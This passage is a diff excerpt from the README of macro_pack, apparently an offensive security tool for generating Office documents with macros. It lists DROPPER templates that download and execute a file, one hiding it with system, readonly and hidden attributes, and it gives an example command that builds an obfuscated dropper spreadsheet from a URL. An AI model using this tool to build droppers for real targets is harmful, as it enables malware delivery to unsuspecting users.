sevagas/macro_pack/README.md

         Note that macro_pack will automatically detect AutoOpen, Workbook_Open, or Document_Open  as the start function -t, --template=TEMPLATE_NAME
         Available templates:
-            DROPPER -> Download and exec file
+        	HELLO   -> Just print a hello message and awareness about macro -> Example use: echo "@EmericNasi" | %s -t HELLO -P hello.pptm DROPPER -> Download and exec file
                     -> Example use:  echo <file_to_drop_url> "<download_path>" | macro_pack.exe -t DROPPER -o -x dropper.xls
             DROPPER2 -> Download and exec file.
 File attributes are also set to system, readonly, and hidden